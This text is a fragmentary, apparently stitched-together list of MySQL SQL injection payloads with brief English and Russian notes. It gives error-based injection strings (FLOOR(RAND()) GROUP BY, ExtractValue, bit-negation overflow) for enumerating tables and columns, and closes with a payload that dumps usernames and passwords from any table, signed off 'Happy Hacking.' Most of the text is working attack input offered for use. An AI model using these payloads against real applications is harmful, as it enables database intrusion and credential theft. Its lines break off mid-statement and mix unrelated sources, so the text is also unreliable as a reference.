Numeric: Query like SELECT * FROM Table WHERE id = FUZZ
Select sum(record_count) as total_database_record_ct from tcounts
1 AND (SELECT 1 FROM (SELECT COUNT(*),concat(0x3a,(SELECT column_name FROM information_schema.COLUMNS WHERE TABLE_NAME="table1" LIMIT 0,1),0x3a,FLOOR(rand(0)*2))a FROM information_schema.COLUMNS GROUP BY a LIMIT 0,1)b)
x from information_schema.tables group by x)a) and '1'='1. Получение имен всех таблиц: Примечание: m-n подразумевает результат подсчетов значения при m=0, m+1…n-1 hex_code_of_database_name заменить на нужное значение m-n заменить на нужное значение.
clause Payload: id=3 AND (SELECT 1489 FROM(SELECT COUNT(*),CONCAT(0x3a73776c3a,(SELECT (CASE WHEN (1489=1489) THEN 1 ELSE 0 END)
Payload: ID=1' AND (SELECT 3371 FROM(SELECT COUNT(*),CONCAT(0x7178717071,(SELECT (ELT(3371=3371,1))),0x7176767a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'VppA'='VppA.
eWgj') AND (SELECT 8208 FROM(SELECT COUNT(*),CONCAT(0x716a767a71,(SELECT (ELT(8208=8208,1))),0x7176707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ('Zaph'='Zaph.
AND ExtractValue(1, CONCAT(0x5c, (SELECT column_name FROM information_schema.columns LIMIT 1)));-- Available in MySQL 5.1.5.
e.g. select !(select * from (select version())x) - ~0; - ~ is bit negation, ! makes typecast from string to number.
$post_data = any data',(select group_concat(username,0x3a,password) from any_table_name_here))--. You can also use Limit if required, if you dont know how to use Limit go and read Death Row Injection. Happy Hacking.